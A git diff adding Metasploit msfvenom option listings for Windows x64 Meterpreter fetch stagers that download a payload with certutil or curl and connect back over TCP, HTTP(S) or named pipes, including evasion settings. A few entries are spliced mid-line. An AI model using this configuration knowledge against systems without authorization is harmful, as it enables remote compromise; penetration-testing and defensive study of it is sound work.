@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GkZvIxbSLgd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker via a named pipe pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..acae401 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VqRUYbmlZj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of 
seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt new file mode 100644 index 0000000..6f4d9e5 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_rc4.txt 
@@ -0,0 +1,99 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Tot +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4: +========================= + +ephen_fewer@harmonysecurity.com> + OJ Reeves + hdm + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jOCxwErCGMJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of 
seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..381ab3e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_tcp_uuid.txt 
@@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME bslRynmtyJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of 
seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt new file mode 100644 index 0000000..fd114f7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttp.txt 
@@ -0,0 +1,112 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_winhttp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_winhttp: +========================= + +wer@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME PQOQuzSmusdT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + 
HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt new file mode 100644 index 0000000..83aa5e8 
--- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_winhttps.txt 
@@ -0,0 +1,114 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_winhttps + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_winhttps: +========================= + +er@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LcHnpQmXfcW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTPS (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + 
HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically 
